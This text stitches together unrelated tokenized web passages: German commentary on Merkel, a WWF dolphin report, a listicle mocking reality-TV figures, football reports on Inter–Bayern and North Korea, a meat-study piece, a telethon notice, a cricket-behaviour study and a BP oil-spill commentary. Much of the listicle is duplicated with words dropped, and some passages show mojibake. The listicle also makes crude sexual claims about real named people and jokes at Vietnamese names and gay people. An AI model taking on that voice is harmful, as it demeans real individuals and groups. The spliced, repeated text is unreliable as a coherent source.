Denn auch wenn die Union unter Merkel wieder zum Kanzlerinnen - Wahlverein geworden ist , könnte doch der Fehler , als den sich die Wulff - Berufung so oder so entpuppen wird , zur Initialzündung für die Merkel - Gegner in der Union werden .
Merkel steht jetzt allein da , auch weil sie ihren letzten Konkurrenten losgeworden ist .
Sie wird vor niemandem mehr in Schutz genommen werden müssen , und zugleich für alle Fehler und Pannen ganz allein verantwortlich sein .
Nicht einmal die brüskierte Ursula von der Leyen kann noch zum Lager ihrer Verbündeten gezählt werden .
Sollte Angela Merkel Spiele spielen , dürfte ihr Lieblingsspiel wohl Malefiz sein .
Darin geht es darum , vorwärts zu kommen , indem man den anderen Hindernisse in den Weg legt .
Das ist genau ihr Rezept .
Merkel , die mathematisch geschulte Malefizspielerin im Kanzleramt , ist ihrem Meister Helmut Kohl sehr ähnlich .
Im Unterschied zu diesem hat sie aber inhaltlich gar keine Agenda , außer der Macht selbst .
Sie ist keine Teamspielerin , sie steht im Zweifel nicht für andere ein , sie ist nur interessiert an eigener Profilierung .
Die Union kann sich auf sie nicht verlassen .
Wenn man Angela Merkel genau zusieht , beginnt man Ursula von der Leyen zu lieben .
( Rüdiger Suchsland )
The Mekong River Irrawaddy dolphin ( Orcaella brevirostris ) population inhabits a 190 km stretch of the Mekong River between Cambodia and Lao PDR .
Since 2003 , the population has suffered 88 deaths of which over 60 percent were calves under two weeks old .
The latest population is estimated between 64 and 76 members .
" Necropsy analysis identified a bacterial disease as the cause of the calf deaths .
This disease would not be fatal unless the dolphinâ €™s immune systems were suppressed , as they were in these cases , by environmental contaminants , " said Dr VernÃ© Dove , report author and veterinarian with WWF Cambodia .
! ADVERTISEMENT !
Researchers found toxic levels of pesticides such as DDT and environmental contaminants such as PCBs during analysis of the dead dolphin calves .
These pollutants may also pose a health risk to human populations living along the Mekong that consume the same fish and water as the dolphins .
Article continues
At one point in their lives , everyone Googles themselves .
Personally , I always add my name to an Internet search just to make sure the pornography I 'm about to look at involves me .
But here are eight individuals who are so self - obsessed that they do n't even need nudity to masturbate when they find themselves on the Web .
Please enjoy 8 Assholes Who Found This Article By Googling Themselves .
Advertisement
8 Tila Tequila Tila Tequila first appeared in Fantastic Four # 13 , and is the poster girl for Internet Fame Whore .
At first glance she seems to be a naked Earth woman , but upon scrutiny you realize that someone attacked a giant - headed boy and gave it breast implants during a knife fight .
She became famous for her massive amount of MySpace friends , and to give you an idea of how loyal these Internet friends were , when she asked them to buy her song , so few of them did that it legally stopped existing .
Her music is so unappreciated that she might as well have put her tits away and led a dignified life .
Trees falling in the woods have more fans .
Her real name is Tila Nguyen because the people of Vietnam never invented a second last name .
Which means asking Vietnamese children to line up alphabetically is as confusing and impossible as asking Tila Tequila for her hat size .
If it gets her attention , Tila will try it .
She 's faked pregnancies , Tweeted about domestic abuse and she was the only survivor from her engagement to a woman .
She had a bisexual reality dating show that gave my Tivo genital sores .
It was so disgusting that cable providers did n't even give episode descriptions .
They gave warnings : Tila Tequila first appeared in Fantastic Four # 13 , and is the poster girl for Internet Fame Whore .
At first glance she seems to be a naked Earth woman , but upon scrutiny you realize that someone attacked a giant - headed boy and gave it breast implants during a knife fight .
She became famous for her massive amount of MySpace friends , and to give you an idea of how loyal these Internet friends were , when she asked them to buy her song , so few of them did that it legally stopped existing .
Her music is so unappreciated that she might as well have put her tits away and led a dignified life .
Trees falling in the woods have more fans .
Her real name is Tila Nguyen because the people of Vietnam never invented a second last name .
Which means asking Vietnamese children to line up alphabetically is as confusing and impossible as asking Tila Tequila for her hat size .
If it gets her attention , Tila will try it .
She 's faked pregnancies , Tweeted about domestic abuse and she was the only survivor from her engagement to a woman .
She had a bisexual reality dating show that gave my Tivo genital sores .
It was so disgusting that cable providers did n't even give episode descriptions .
They gave warnings :
7 Mr. Boston When Flavor Flav rejected Janice from The Electric Mayhem , she let mad scientists experiment on her body and then starred in a dating show of her own called I Love New York .
One contestant was Lee Marks , who she nicknamed Mr. Boston .
He was a nerd in every direction .
He moved like space squids hollowed out a sex offender and were drunk driving him .
He was so confused about women that he could n't get laid inside Tila Tequila .
Mr. Boston thought breast feeding was something you did with gravy and a fat girl and watching him try to figure out dating was more tense than watching someone with disseminated sclerosis try to disarm a bomb by candlelight .
And he was n't trying to score with a girl from his chess club .
He was trying to hook up with a cartoon of a black woman capable of losing skis in her vagina .
If Mr. Boston aimed a motorcycle at New York while she was in stirrups , she would n't even look up from her magazine .
Boston went on to do I Love Money , a reality show that humiliated fame whores without the pretext of finding them dates , and one game involved everyone cramming money into their speedos .
This was a problem for Mr. Boston since he 'd already secretly filled his speedo with toilet paper to disguise his medically hilarious penis .
He had a tough decision to make .
Almost immediately , he on camera began removing wad after wad of dick padding from his panties to make room for cash .
There has never been a clearer visual metaphor for someone trading their dignity for money .
Mr. Boston will let you crap in his mouth if you promise to write him a check and tell people about it .
So here 's his reality : Mr. Boston is now famous for having a tiny dong , being terrible with women and looking like a late term abortion in his speedo .
Unfortunately , Mr. Boston stopped paying attention to reality after the word " famous . "
He thinks of himself as an ordinary celebrity and he has tried to parlay that into freeing his tubular tofu body of its virginity .
Two female friends of mine have met Mr. Boston and verified that he immediately propositioned them for casual sex .
So casually in fact that they thought he might not know what sex actually is .
On a " Where Are They Now ? " special , a tour of his home revealed that he keeps his latest STD results posted on his bedroom door so any of his " groupies " feel more comfortable giving him sex .
It had all the practicality of a zombie defense plan , but seemed even less likely to be necessary .
When Flavor Flav rejected Janice from The Electric Mayhem , she let mad scientists experiment on her body and then starred in a dating show of her own called I Love New York .
One contestant was Lee Marks , who she nicknamed Mr. Boston .
He was a nerd in every direction .
He moved like space squids hollowed out a sex offender and were drunk driving him .
He was so confused about women that he could n't get laid inside Tila Tequila .
Mr. Boston thought breast feeding was something you did with gravy and a fat girl and watching him try to figure out dating was more tense than watching someone with disseminated sclerosis try to disarm a bomb by candlelight .
And he was n't trying to score with a girl from his chess club .
He was trying to hook up with a cartoon of a black woman capable of losing skis in her vagina .
If Mr. Boston aimed a motorcycle at New York while she was in stirrups , she would n't even look up from her magazine .
Boston went on to do I Love Money , a reality show that humiliated fame whores without the pretext of finding them dates , and one game involved everyone cramming money into their speedos .
This was a problem for Mr. Boston since he 'd already secretly filled his speedo with toilet paper to disguise his medically hilarious penis .
He had a tough decision to make .
Almost immediately , hebegan removing wad after wad of dick padding from his panties to make room for cash .
There has never been a clearer visual metaphor for someone trading their dignity for money .
Mr. Boston will let you crap in his mouth if you promise to write him a check and tell people about it .
So here 's his reality : Mr. Boston is now famous for having a tiny dong , being terrible with women and looking like a late term abortion in his speedo .
Unfortunately , Mr. Boston stopped paying attention to reality after the word " famous . "
He thinks of himself as an ordinary celebrity and he has tried to parlay that into freeing his tubular tofu body of its virginity .
Two female friends of mine have met Mr. Boston and verified that he immediately propositioned them for casual sex .
So casually in fact that they thought he might not know what sex actually is .
On a " Where Are They Now ? " special , a tour of his home revealed that he keeps his latest STD results posted on his bedroom door so any of his " groupies " feel more comfortable giving him sex .
It had all the practicality of a zombie defense plan , but seemed even less likely to be necessary .
6 Sex So You Think You Can Dance is producer Nigel Lythgoe 's attempt at finding the next big dance star .
However , since that 's not a position that actually exists , it might just be his way of replacing all of prime time with half - naked teens .
And what goes better with nude teens better than a stringy - haired dungeon master in swimming trunks ?
So You Think You Can Dance is producer Nigel Lythgoe 's attempt at finding the next big dance star .
However , since that 's not a position that actually exists , it might just be his way of replacing all of prime time with half - naked teens .
And what goes better with nude teens better than a stringy - haired dungeon master in swimming trunks ?
Enter : Sex .
Sex is an empty - eyed nerdy creep obsessed with becoming not only a celebrity , but a sexy male sex icon .
As he describes it , he wants to be like a Brittney Spears , only the boy version .
He 's categorically insane , and as you can imagine , did n't dance very well in his audition .
He moves like his knees failed their saving throws against bending and the parking cones inserted 15 years ago by his high school bullies seem to still be in there .
He 's got the grace of chicken rape .
Luckily , when the dance judges screamed at him for wasting everyone 's time , his mother was there to defend him and his sex appeal .
It was all so perfectly insane that it had to be a prank , right ?
Wrong .
Sex was already well known by many people in the dance community as the strange man in the back of the class .
And on that subject , what goes through the head of a dad who drops his daughter off for ballet and sees " Sex " in her class ?
Does he come back after rehearsal , or does he just plan on picking her up in the woods after her classmate named Sex strangles her and dumps the body ?
After failing to make it as a dancer , Sex has gone on to audition for a couple other reality shows and his mom still drives him to the So You Think You Can Dance auditions every year .
It 's cute for her to support her son's chemical imbalance , but Sex could do a routine in the center of 300 sudden epileptic seizures and the paramedics would still stop and comment how he 's the shittiest dancer in the room .
He 's such a clumsy attention whore that you 'd swear you 're watching a barking sea lion wrestle to the top of a pile .
I almost feel sorry for Sex .
Not because he's got the mind of a little girl , but because when he obsessively Googles his name , he has to go through 27,000 pages of birth canals mixed with God - knows - what before he finds any mention of himself .
A guy named Sex has more trouble finding himself on the Internet than a guy named Nguyen has finding his chair at a Vietnamese wedding reception .
5 Neil Fifer
To uncover Neil Fifer 's identity , we first need to enter a world of thrilling intrigue .
For a few months , every article on Cracked had a comment slightly more nonsensical than the others that ended with an Internet Movie Database link .
At first I thought this was spam left by a robot , like the ones who try to tell us about shoe bargains with their incoherent , dying breaths , but even the worst spams at least try to sell something .
These comments simply wanted us to see that Neil Fifer , a 50 - year - old Canadian actor , played an uncredited paleontologist in 1998 's T - Rex : Back to the Cretaceous .
Why !?
Let me show you an example .
The following is a comment from an article I wrote about Daredevil prematurely ejaculating .
It was from someone named Angelina Jolie : " Super Senses ? YeahÃ Â? heÃÂ ?s got game !
http://www.imdb.com/name/nm1292175/
Bagged chicks into the triple digits ( lucky ladies ) ! "
This seemed strange because no one has " bagged chicks " since 1961 , and because Angelina Jolie is n't type of person to butt into a comic book discussion to rant about irrelevant Canadian cocks .
So I asked Cracked 's computer experts to send me any other comments he might have made .
They came back with over 60 almost exactly like it .
One of my favorites comes from an article I wrote that had nothing to do at all with Jennifer Aniston , where someone with the username " Aniston is gettinÃ  Â? some ! " wrote : " Hey as anyone else read that this guy is filling up Jennifer regularly like a hot water bottle ?
http://www.imdb.com/name/nm1292175/
If soÃ Â ? good for him .
If soÃ  Â ? good for her ( she needs some loosening up from the backside ! ) . "
While it was good to finally answer the question of which background actor 's penis would be the best cure for Friends star Jennifer Aniston 's constipation , I was starting to see a pattern .
Sure enough , all of these comments came from the same IP address which is a computer 's way of saying , " I KNOW THAT IS YOU , NEIL FIFER . "
A Google search revealed that someone was going around the Internet and informing everyone that Neil Fifer was going to be the next Captain America and he was also sleeping with Angelina Jolie and Jennifer Aniston .
It was so obvious to everyone who this was and what he was doing that no other commenter ever bothered to ask , " Who the hell is Neil Fifer and why are you doing this , Neil Fifer ? "
The closest he ever came to getting a response was when he made another fake name to agree with the first that Angelina Jolie was very lucky to have such a handsome yet mysterious dick inside her .
Do we not send our good TV shows to Canada ?
Because I could have sworn I saw the PG - rated version of this on Arrested Development .
Neil Fifer 's next publicity stunt is probably going to be putting on a dress , buying surgical sutures and telling the drugstore clerk that he 's repairing his backside that was so ably loosened by actor Neil Fifer who can be contacted through his agency , Fifer Equities , Inc. and is available for voice over work and Bar Mitzvahs .
To uncover Neil Fifer 's identity , we first need to enter a world of thrilling intrigue .
For a few months , every article on Cracked had a comment slightly more nonsensical than the others that ended with an Internet Movie Database link .
At first I thought this was spam left by a robot , like the ones who try to tell us about shoe bargains with their incoherent , dying breaths , but even the worst spams at least try to sell something .
These comments simply wanted us to see that Neil Fifer , a 50 - year - old Canadian actor , played an uncredited paleontologist in 1998 's T - Rex : Back to the Cretaceous .
Let me show you an example .
The following is a comment from an article I wrote about Daredevil prematurely ejaculating .
It was from someone named This seemed strange because no one has " bagged chicks " since 1961 , and because Angelina Jolie is n't type of person to butt into a comic book discussion to rant about irrelevant Canadian cocks .
So I asked Cracked 's computer experts to send me any other comments he might have made .
They came back with over 60 almost exactly like it .
One of my favorites comes from an article I wrote that had nothing to do at all with Jennifer Aniston , where someone with the username " " wrote :
While it was good to finally answer the question of which background actor 's penis would be the best cure for Friends star Jennifer Aniston 's constipation , I was starting to see a pattern .
Sure enough , all of these comments came from the same IP address which is a computer 's way of saying , " I KNOW THAT IS YOU , NEIL FIFER . " A
Google search revealed that someone was going around the Internet and informing everyone that Neil Fifer was going to be the next Captain America and he was also sleeping with Angelina Jolie and Jennifer Aniston .
It was so obvious to everyone who this was and what he was doing that no other commenter ever bothered to ask , " Who the hell is Neil Fifer and why are you doing this , Neil Fifer ? "
The closest he ever came to getting a response was when he made another fake name to agree with the first that Angelina Jolie was very lucky to have such a handsome yet mysterious dick inside her .
Do we not send our good TV shows to Canada ?
Because I could have sworn I saw the PG - rated version of this on Arrested Development .
Neil Fifer 's next publicity stunt is probably going to be putting on a dress , buying surgical sutures and telling the drugstore clerk that he 's repairing his backside that was so ably loosened by actor Neil Fifer who can be contacted through his agency , Fifer Equities , Inc. and is available for voice over work and Bar Mitzvahs .
4 Ian Bernardo
If the only requirement for being on a show is waiting in a line for six days , Ian Bernardo will appear on it .
He first appeared on American Idol in a T - shirt with his name on it , and did n't even try to sing .
Then he showed up on So You Think You Can Dance and did n't even try to dance .
He acts like a bitchy queen and looks like Edward G. Robinson 's face was genetically modified to create a blowjob assembly line , but he 's such an offensive caricature that I do n't think he 's actually gay .
He acts like an eight - year - old whose only experience with gay culture is the He-Man cartoon from the 80s decided to pretend to be gay for Halloween .
Of course , even if he 's straight , Ian Bernardo would suck a horse off if he thought it would make The Farm Report .
And if he is really gay , that would n't stop him from sleeping with his sister in exchange for 20 seconds of her attention .
On the American Idol 2010 Finale , Dane Cook performed a terrible song and let Ian and other rejects like Floppy Lovehandles Girl on stage .
Ian Bernardo immediately grabbed the microphone and announced that he was Ian Bernardo .
I 've seen fake suicides that were less pathetic .
While Ian was in the middle of whining for everyone to look at him , some other attention whore thought that he had a great idea and tried the same thing .
He had to fight the microphone away from her .
In this article 's final animal kingdom analogy , they were like two baby birds begging for their mother 's vomit and then watching it fly away when it smelled that they 'd been handled by strange human hands .
If the only requirement for being on a show is waiting in a line for six days , Ian Bernardo will appear on it .
He first appeared on American Idol in a T - shirt with his name on it , and did n't even try to sing .
Then he showed up on So You Think You Can Dance and did n't even try to dance .
He acts like a bitchy queen and looks like Edward G. Robinson 's face was genetically modified to create a blowjob assembly line , but he 's such an offensive caricature that I do n't think he 's actually gay .
He acts like an eight - year - old whose only experience with gay culture is the He-Man cartoon from the 80s decided to pretend to be gay for Halloween .
Of course , even if he 's straight , Ian Bernardo would suck a horse off if he thought it would make The Farm Report .
And if he is really gay , that would n't stop him from sleeping with his sister in exchange for 20 seconds of her attention .
On the American Idol 2010 Finale , Dane Cook performed a terrible song and let Ian and other rejects like Floppy Lovehandles Girl on stage .
Ian Bernardo immediately grabbed the microphone and announced that he was Ian Bernardo .
I 've seen fake suicides that were less pathetic .
While Ian was in the middle of whining for everyone to look at him , some other attention whore thought that he had a great idea and tried the same thing .
He had to fight the microphone away from her .
In this article 's final animal kingdom analogy , they were like two baby birds begging for their mother 's vomit and then watching it fly away when it smelled that they 'd been handled by strange human hands .
3 Heidi Montag Heidi is one half of Spencer & Heidi or " Speidi , " the cultural equivalent of AIDS .
Their career started on The Hills , a show by and for people with tiny wheelchairs where their brains used to be .
Since then , Heidi has done anything she could think of to get mentioned .
She 's so self - obsessed that she goes to grocery stores and puts stickers of her face over kidnapped children on milk cartons .
Heidi and Spencer are so desperate for us to hear about their personal lives , that it 's almost a philosophical victory to not know anything about them .
Which is why I feel good about reporting this as fact : Heidi Montag had to power sand her crotch to a smooth finish because her husband can't reach the back of a bottle cap with his dick .
They 're currently going through a divorce , so it 's nice to know we officially live in a world where gay unions damage the sanctity of marriage but these two genetic diarrhea bags are allowed to use divorce as a publicity stunt .
There are certain curse words we save for special occasions just so when we meet someone who so clearly deserves our worst one like Heidi Montag we have a word strong enough to describe her .
Heidi's obsession with cosmetic surgery has turned her into a patchwork ghoul of plastic and ass fat .
She even got something called a " back scoop . "
I 'm too scared to Google it , but I 'm absolutely certain this is a procedure where a doctor takes a post hole digger and carves out room for all her former stepfathers to have sex with her at the same time .
If you punched this thing in the " face , " it would squirt donkey lips and saline bags out its spinal blowholes and you'd be arrested for tampering with medical waste .
She 's gone on to become a singer , or more accurately , her swelled gash of a once - human mouth has been modified into a delivery system for bioweapons .
Heidi and her little bitch of a husband actually wrote a book called How To Be Famous : Our Guide to Looking the Part , Playing the Press and Becoming a Tabloid Fixture .
If you 're adjusting your moral compass , this book lies somewhere between A Rapists Guide To Rape and I Can Haz Cheezburger Presents : Photos of Hitler 's One Ball in Sleeping People 's Mouths .
Heidi is one half of Spencer & Heidi or " Speidi , " the cultural equivalent of AIDS .
Their career started on The Hills , a show by and for people with tiny wheelchairs where their brains used to be .
Since then , Heidi has done anything she could think of to get mentioned .
She 's so self - obsessed that she goes to grocery stores and puts stickers of her face over kidnapped children on milk cartons .
Heidi and Spencer are so desperate for us to hear about their personal lives , that it 's almost a philosophical victory to not know anything about them .
Which is why I feel good about reporting this as fact : Heidi Montag had to power sand her crotch to a smooth finish because her husband can't reach the back of a bottle cap with his dick .
They 're currently going through a divorce , so it 's nice to know we officially live in a world where gay unions damage the sanctity of marriage but these two genetic diarrhea bags are allowed to use divorce as a publicity stunt .
There are certain curse words we save for special occasions just so when we meet someonelike Heidi Montag we have .
Heidi's obsession with cosmetic surgery has turned her into a patchwork ghoul of plastic and ass fat .
She even got something called a " back scoop . "
I 'm too scared to Google it , but I 'm absolutely certain this is a procedure where a doctor takes a post hole digger and carves out room for all her former stepfathers to have sex with her at the same time .
If you punched this thing in the " face , " it would squirt donkey lips and saline bags out its spinal blowholes and you'd be arrested for tampering with medical waste .
She 's gone on to become a singer , or more accurately , her swelled gash of a once - human mouth has been modified into a delivery system for bioweapons .
Heidi and her little bitch of a husband actually wrote a book called How To Be Famous : Our Guide to Looking the Part , Playing the Press and Becoming a Tabloid Fixture .
If you 're adjusting your moral compass , this book lies somewhere between A Rapists Guide To Rape and I Can Haz Cheezburger Presents : Photos of Hitler 's One Ball in Sleeping People 's Mouths .
2 Phoebe Price Phoebe Price is the type of famous that 's always mentioned in the same breath as the question , " What the fuck is she famous for ? "
She claims to be a supermodel and an actress , but she looks like someone tried to recreate their grandmother out of Turtle Wax and she 's in fewer movies than Bigfoot .
The only notable thing about her is if her blood touches scorpions , they become giant scorpions .
Phoebe Price 's Phoebe Price is the type of famous that 's always mentioned in the same breath as the question , " What the fuck is she famous for ? "
She claims to be a supermodel and an actress , but she looks like someone tried to recreate their grandmother out of Turtle Wax and she 's in fewer movies than Bigfoot .
The only notable thing about her is if her blood touches scorpions , they become giant scorpions .
Phoebe Price 's website is a bizarre shrine to nothingness featuring nightmarish animations of her head smearing across America and a collection of broken links she labeled " Celebrity . "
Which sucks , because I honestly wanted to know what Phoebe Price does during the day other than chase travelers away from her eggs .
" Arjen Robben could n't be any more of a one - man band if he had cymbals tied to his ankles , " said the man in the next seat .
He did happen to be the Guardian 's Jonathan Wilson .
If our resident tactical authority had been depending on Bayern to give him food for thought he would have starved .
Robben , however , did nourish hope , at least until Diego Milito recorded his second goal of the night .
Still the 26 - year - old Bayern player deserves to be remembered for his efforts , particularly since he has so often been treated as a creature frail of body and , the insinuations suggest , mind .
He could not have been more defiant or resourceful .
There was a first - half moment , with the match goalless , when José Mourinho hugged Robben as he stepped off the pitch .
The incident had charm considering how much was at stake in the Bernabéu , but perhaps there was pity as well as fondness .
Too much rested with the Holland winger .
Bayern could point to the suspension of Franck Ribéry but he is far from being a constant inspiration .
Louis van Gaal 's team were also unlucky before the opener when the English referee Howard Webb saw nothing intentional about Maicon reaching out his arm and touching a cross in the goalmouth .
It had , of course , been Robben who caused the havoc , with an inswinging delivery .
Inter had a greater number of men with the faith and technique to cause havoc .
The opener was incongruous in its combination of route one interplay and delightful deftness .
Júlio César kicked the ball straight down but his targets reacted as if they had been pampered with tailor - made service .
Milito headed to Wesley Sneijder and took the return before chipping the ball home .
Throughout the final the sole risk to Mourinho was Robben .
Late in the match the statistics showed that Bayern had enjoyed two - thirds of the possession .
What did Inter care when finishing was poor and the response to Robben 's service so feeble ?
Even the winger looked resigned to his fate as the match wore on .
Inter were painstaking rather than exuberant yet always knew they were a grade above Bayern .
Mourinho rejoiced at the end and is thought likely to stay at this venue as manager of the home team .
Perhaps Real Madrid might give him the means to bring Robben back to the Bernabéu and make up for his underachievement in a two - year stint .
By Mike Henson
A small piece of football history will be made in Johannesburg on Tuesday when Brazil play North Korea for the first time , perhaps the most incongruous pairing thrown up by the World Cup draw .
Brazil are five - time winners and the world 's top - ranked side ; most of their players are superstars on a global level .
The majority of North Korea 's squad are unknowns , insulated from the intense glare of the world 's biggest tournament in their secretive homeland .
At 105th , they are also the lowest - ranked team at the competition .
The images projected by the two nations are similarly far apart .
Brazil is synonymous with an unfettered joy of expression , illustrated perhaps most vividly down the years by its football team .
Think of North Korea , however , and thoughts instinctively turn to a political regime , whose military spending and belligerent foreign policy earned them a place alongside Iraq and Iran in former United States president George W Bush 's ' Axis of Evil ' .
Their domestic media were described as " so suppressed they are non-existent " by campaign group Reporters Without Borders and the few interviews that have appeared from inside the squad have been full of cliches .
" Perhaps there is no other team in the world who would be fighting with the same dedication to please the leader and to bring fame to their motherland , " said coach Kim Jong - Hun .
Kim Jong - Hun 's side qualified with a 0 - 0 draw away to Saudi Arabia North Korea 's domestic game is predictably impenetrable .
Clubs do not participate in Asian continental competitions , partly due to their failure to abide by international transfer rules , but unfortunately for Kim , Fifa were sufficiently clued up about the country to spot his attempt to fill one of the three mandatory goalkeeper places in his 23 - man squad with an extra striker , Kim Myong - Won .
BBC World Service 's Richard Fleming , who followed the national team on a tour of France in 2009 , says North Korea 's players are " very dismissive of the west , and the western media " .
He added : " I knew that , they knew that and they knew that I knew that .
There was very much a coldness and mistrust , but also maybe a fear on their part . "
Michael Church , Asia correspondent for World Soccer magazine , tried to track down the team at last December 's East Asian Games in Hong Kong , yielding similar results .
" While the rest of the teams were staying in downtown Hong Kong where all the tourists stay , they were set in an outdoor recreation centre as far away from prying eyes as possible , " he added .
" It was surrounded by hedges and fences and locked gates and set away from the road .
They were completely isolated , which is exactly the way they wanted it . "
606 : DEBATE
Headlines about North Korea in the build - up to the tournament have hardly been positive .
The decision to accept an invitation to base themselves in Zimbabwe - the only one of the 32 teams to do so - led to anger among the local population because North Korea has been involved in training government troops .
Meanwhile , there have been reports that some of North Korea 's ticket allocation has been handed to China and that those left at home could be unable to watch the finals if the South Korean TV coverage they depend on falls victim to escalating tensions between the two nations .
Through it all , however , North Korea have the eternal appeal of the underdog .
And that appeal is intensified by their performance in their only previous World Cup appearance 44 years ago .
In 1966 , when the World Cup was played in England , they progressed from their group with a shock 1 - 0 win over much - fancied Italy and stormed into a 3 - 0 lead against Portugal in the quarter - finals , only to be finally beaten 5 - 3 .
" They had this very fast game , they called it Chollima football , " said Nick Bonner , an executive producer on the documentary Game of Their Lives which tracked down the 1966 squad .
" Chollima was a mythical Pegasus - like horse which carried an intellectual and a worker over impressive distances and it was how the players played their football .
They were particularly fit and the matches were relatively slowly paced .
" Along came these Koreans , who one of commentators of the time described as like clockwork mice who were wound up and whizzed on until they had no energy . "
The national side have not come close to reproducing that performance since , although the nation 's women 's team are currently ranked fifth in the world and the under - 19s were crowned Asian champions in 2006 , but Bonner insists : " The passion for the game is absolute . "
The current side is built on a strong defence , which conceded just five goals in 14 games as they emerged from qualifying ahead of the likes of Saudi Arabia and Iran .
" The one thing they can certainly do at Asian level is defend .
They are very well organised , " said Church .
In attack , North Korea will look to skipper Hong Yong - Jo , who was their top scorer in qualifying , breaking from midfield to net four of their 11 goals .
Meanwhile , Jong Tae - Se , a physical frontman with seven goals in 13 games for Japanese side Kawasaki Frontale this season , will be tasked with holding the ball up while his deep - lying colleagues supplement the attack .
Pak Do -Ik - scorer of the winner against Italy in 1966 - has urged the current team to deliver " payback " to Portugal , who they meet in their second group game in South Africa .
North Korea players take in the Riverside atmosphere in 2002 Such a result is unlikely .
Instead , North Korea have more chance of repeating the 1966 team 's victories over hearts and minds .
North Korea played all three of their group games at Middlesbrough 's Ayresome Park ground and when they travelled to Liverpool to take on Portugal , thousands of Teessiders followed .
In 2002 , Pak and the other six surviving members of the squad returned to parade around Middlesbrough 's new Riverside home ahead of a match against Leeds while Boro 's ladies team are planning to tour North Korea in the autumn .
" They came up to Middlesbrough and because of their attitude were embraced by the local population , " said Bonner .
" If they can achieve that in Africa that will really be something .
They will love that because they really play well to a crowd . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Tony Cenicola / The New York Times
A new Harvard study that found no increased risk of heart disease among meat eaters is generating a lot of buzz for red meat .
“ A Guilt - Free Hamburger , ” reads one headline .
“ Order the Steak , ” begins another .
But the research , published this week in the journal Circulation , is not so much a celebration of red meat as it is an indictment of processed meats like bacon , sausage and deli meats .
Eating one serving of those foods a day was associated with a 42 percent higher risk of heart disease and 19 percent increased risk of diabetes .
But there was no increase in risk associated with eating unprocessed red meat .
The findings come from a broad analysis of several studies tracking meat consumption and cardiovascular diseases and diabetes .
Processed meats include bacon , salami , sausages , hot dogs or processed deli or luncheon meats .
Notably , the culprit in processed meats was n’t the saturated fat or cholesterol — both whole cuts of meat and processed meats contained the same amount per serving .
The big differences were the levels of sodium and chemical preservatives .
Processed meats had about four times more sodium and 50 percent more nitrate preservatives than unprocessed meats .
The study suggests meats like burgers and steaks have been wrongly implicated in heart disease .
But that mistake likely occurred because the people who eat a lot of meat also tend to consume high amounts of bacon , hot dogs and other processed meats .
While it ’s true that the study will make it easier to enjoy a burger , at least if we ’re worried about our heart , it does n’t address research that has linked an increased risk of colon cancer with high meat consumption .
In addition , many people skip red meat not for personal health reasons but because they are concerned about the health of the planet .
Livestock account for 18 percent of all greenhouse gas emissions .
Compared with a burger , a peanut butter and jelly sandwich saves as much as 2.5 pounds of carbon dioxide , 280 gallons of water and 50 square feet of land , according to the Web site PBJCampaign.org
And for more on the nonhealth reasons to cut back on red meat , read this story by the Times food writer Mark Bittman , “ Rethinking the Meat Guzzler . ”
Volunteers at the CHEO telethon will take your donations to help children in need of hospital care .
They 're hoping to better the record - setting $ 6,175,843 raised last year .
The 27th annual telethon will run from 7 p.m. Saturday to 7 p.m. Sunday on CTV Ottawa .
CTV Ottawa News at 6 anchors Graham Richardson and Carole Anne Meehan , Weekend News anchor Kimothy Walker and a number of other CTV personalities will take part in the telethon , which is helmed by former CTV Ottawa news anchor Max Keeping .
The Canadian War Museum will host the event for the first time .
The telethon has raised more than $ 60 million since its first year in 1984 .
The money helps fund research , purchase new equipment , train staff , create a more child - and youth - friendly environment , enhance the paediatric nature of the hospital , and assist families in crisis .
Thanks to a kind of science reality show , evolutionary biologists are getting a reality check .
The day - to - day lives of field crickets , captured on 250,000 hours of surveillance footage , are providing a glimpse into how well studies in the lab match up with life in the wild .
Much of indoor science proved applicable outdoors , but there were surprises , including a more complicated view of how the number of mates relates to the number of offspring , according to the first report on the project , appearing in the June 4 Science .
Biologists have long studied crickets in labs to test ideas about mate choice and other aspects of evolution .
To take those questions into the wild , researchers deployed 64 security cameras with motion detectors and infrared sensitivity to monitor flightless field crickets ( species Gryllus campestris ) day and night in a meadow in northern Spain for the 2006 breeding season .
Rolando Rodríguez - Muñoz of the University of Exeter ’s campus in Penryn , England , watched every hour of the take .
He managed by viewing video from multiple cameras at the same time and speeding through stretches where nothing relevant happened .
One of the surprises , says study coauthor Tom Tregenza , also at Penryn , was that dominant males , which routinely trounce other males in fights , have relatively modest love lives .
Lab studies had shown that females prefer a dominant scent to the whiff of routine losers , and also that dominant males can monopolize females by chasing off rivals .
Despite such advantages , the dominant males in the meadow had only about half the number of mates during the breeding season that the routine losers did .
Yet in a further twist , the dominant males apparently compensated for their relatively low number of mating partners and ended up with plentiful surviving offspring .
“ Just having a lot of mates is n’t the whole story , ” Tregenza says .
Researchers also found that males that sang more ended up with more offspring , as expected from lab work , but that relationship held only for smaller males .
Large male crickets in the meadow attracted females about equally well regardless of how much the males sang .
Even with all the singing and flirting and fighting , reproduction proved an iffy business .
Among 77 females in the meadow , more than 40 left no surviving offspring .
Fewer than 10 managed to leave even one .
Just looking at the beginning of the process , plenty of crickets of both sexes failed to mate even once ( on camera at least ) .
“ For a male , perhaps understandable , but what did these females do wrong ? ” muses Hanna Kokko , currently a visiting fellow at the Australian National University in Canberra , who was not involved in the study .
One prediction that did prove true in the meadow was the fundamental expectation that males typically vary more than females in the number of offspring they produce .
The cricket study provides the first confirmation of this principle in wild invertebrates , Tregenza says .
Animal behaviorist Ann V. Hedrick of the University of California , Davis , who studies a different cricket species , says that the video project “ has provided us with extremely valuable information that really has n’t been possible to collect before . ”
Crickets , fruit flies and other small , easy - to - wrangle invertebrates tend to dominate lab studies of sexual and natural selection .
In contrast , bigger animals such as deer and meerkats are the most common subjects of long - term field studies .
But “ you ca n’t have a lab full of red deer , ” Tregenza says .
The new study attempts to bring together the two research traditions .
“ Crickets live more interesting lives than meerkats , ” Tregenza says , and he would love an invertebrate answer to the actual science reality show Meerkat Manor .
There might be something about the eye of the beholder , he admits , but “ Meerkats , watch out ! ”
See Also :
The BP oil spill and the tyranny of private ownership
11 June 2010
The fifty - first day of the worst ecological catastrophe in US history found Washington redoubling its efforts at containment — not of the Gulf oil spill itself , but of the financial dangers it poses to BP and the oil industry as a whole .
On Thursday , media alarm bells went off when BP shares fell 40 percent below their pre-spill value and the cost of insuring the company ’s bonds against default increased .
Markets were punishing BP over rumors that it might hold back on an upcoming dividend payout of as much as $ 10 billion , according to analysts .
The British financial press has launched a full - throated defense of BP ’s “ right ” and “ duty ” to hand out dividends to shareholders — even as the oil giant obstructs and delays compensation checks to those on the Gulf Coast who have lost their livelihoods as a result of the spill .
